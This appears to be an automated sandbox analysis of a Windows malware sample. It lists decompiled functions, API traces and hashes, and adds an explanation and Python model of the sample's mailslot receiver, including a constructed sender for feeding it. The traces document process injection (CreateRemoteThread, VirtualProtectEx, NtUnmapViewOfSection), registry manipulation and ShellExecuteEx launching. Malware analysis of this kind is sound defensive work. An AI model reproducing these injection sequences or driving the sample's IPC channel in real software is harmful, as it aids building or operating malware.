  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41); // @0x00401033
				_t39 = 0; // @0x0040103d
				_v8 = 0x1000; // @0x0040104c
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0); // @0x0040104f
				_v16 = _t24; // @0x00401057
				if(_t24 == 0) { // @0x0040105a
					_t25 = GetLastError(); // @0x004010d6
					_t36 = _a4; // @0x004010dc
					_v8 = _t25; // @0x004010df
				} else { // @0x0040105c
					_t36 = E004011F2(0x1000); // @0x00401062
					if(_t36 == 0) { // @0x00401066
						L10: // @0x004010c4
						_v8 = 8; // @0x004010c4
					} else { // @0x00401068
						do { // @0x00401068
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed @0x00401076
							if(_t32 == 0) { // @0x0040107e
								_t33 = GetLastError(); // @0x004010a4
								_v8 = _t33; // @0x004010ad
								if(_t33 == 0x79) { // @0x004010b0
									_v16 = 0x1000; // @0x004010b2
									goto L8;
								} // @0x004010b2
							} else { // @0x00401080
								_v12 = _v12 + 0x1000; // @0x00401080
								_t39 = _t39 + _v16; // @0x00401086
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed @0x00401092
								_t36 = _t34; // @0x00401098
								if(_t36 == 0) { // @0x0040109c
									goto L10;
								} else { // @0x0040109e
									_v8 = _v8 & 0x00000000; // @0x0040109e
									goto L8;
								} // @0x0040109e
							} // @0x0040109c
							goto L11;
							L8: // @0x004010b5
							Sleep(0x64); // executed @0x004010b7
						} while (_v16 == 0x1000); // @0x004010bd
					} // @0x004010c2
					L11: // @0x004010cb
					CloseHandle(_v20); // @0x004010ce
				} // @0x004010ce
				if(_v8 == 0) { // @0x004010e6
					_t27 = _a4; // @0x004010e8
					 *(_t27 + 4) = _t36; // @0x004010eb
					 *((intOrPtr*)(_t27 + 8)) = _t39; // @0x004010ee
				} // @0x004010ee
				return _v8; // @0x004010f8
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
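E00401033 is the receive side of a mailslot channel: CreateMailslotA("\\.\mailslot\msl0", 0x1000, 0, NULL) sets a 0x1000-byte maximum message size and a zero read timeout, so ReadFile on an empty slot fails with 0x79 (ERROR_SEM_TIMEOUT), which the loop treats as "nothing yet": it forces the byte count to 0x1000, sleeps 100 ms and retries. Each successful read appends one message to a heap buffer grown by 0x1000 (status 8, ERROR_NOT_ENOUGH_MEMORY, if HeapReAlloc fails), and the do/while ends only when a message shorter than 0x1000 arrives; the buffer pointer and total length are then stored at _a4+4 and _a4+8. The Python below is an added model of that exchange, not code from the sample: the receiver mirrors the decompiled loop, and the sender side is a constructed peer that writes 0x1000-byte messages and terminates with a short one, sending an empty message when the payload length is an exact multiple of 0x1000 (a convention chosen here; the listing only shows the reader).

```python
ERROR_SEM_TIMEOUT = 0x79      # ReadFile on an empty mailslot created with read timeout 0
ERROR_INVALID_HANDLE = 0x6
CHUNK = 0x1000                # buffer size, max message size and growth step used by the sample


def receive_message(read, sleep=lambda ms: None):
    """Model of E00401033's do/while. `read()` stands in for ReadFile on the mailslot and
    returns either bytes (one mailslot message) or an int Win32 error code.
    Returns (status, data, number_of_reads)."""
    data = bytearray()
    reads = 0
    while True:
        reads += 1
        msg = read()
        if isinstance(msg, int):             # ReadFile failed
            if msg != ERROR_SEM_TIMEOUT:
                return msg, bytes(data), reads   # any other error ends the loop (goto L11)
            got = CHUNK                      # sample sets the byte count to 0x1000 to keep looping
        else:
            data += msg                      # HeapReAlloc by 0x1000 and append
            got = len(msg)
        sleep(100)                           # Sleep(0x64) on every iteration, including the last
        if got != CHUNK:                     # only a short (or empty) message ends the loop
            return 0, bytes(data), reads


def chunk_for_sender(payload):
    """Constructed peer side: <=0x1000-byte messages, last one short; empty terminator when the
    payload is an exact multiple of 0x1000 so the receiver's exit condition is ever met."""
    chunks = [payload[i:i + CHUNK] for i in range(0, len(payload), CHUNK)]
    if not chunks or len(chunks[-1]) == CHUNK:
        chunks.append(b"")
    return chunks


def exchange(payload, timeouts_before_first_read=0):
    """Run sender and receiver against an in-memory queue; returns (status, data, read_count).
    Leading ERROR_SEM_TIMEOUT entries simulate the reader polling before the peer has written."""
    queue = [ERROR_SEM_TIMEOUT] * timeouts_before_first_read + chunk_for_sender(payload)

    def read():
        return queue.pop(0) if queue else ERROR_SEM_TIMEOUT

    return receive_message(read)
```

Two consequences for a lab harness that wants to feed this thread: a writer that emits exactly 0x1000 bytes and stops leaves the reader polling forever at 10 reads per second, and a single WriteFile larger than 0x1000 is rejected by the mailslot rather than split, so the sender has to chunk.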
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed @0x00401012
				_t2 = HeapCreate(0, 0x10000, 0); // executed @0x00401014
				if(_t2 == 0) { // @0x0040101c
					_t3 = GetLastError(); // @0x00401026
				} else { // @0x0040101e
					_t3 = E00401639(_t2, _t4); // executed @0x0040101f
				} // @0x0040101f
				ExitThread(_t3); // @0x0040102d
			}

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
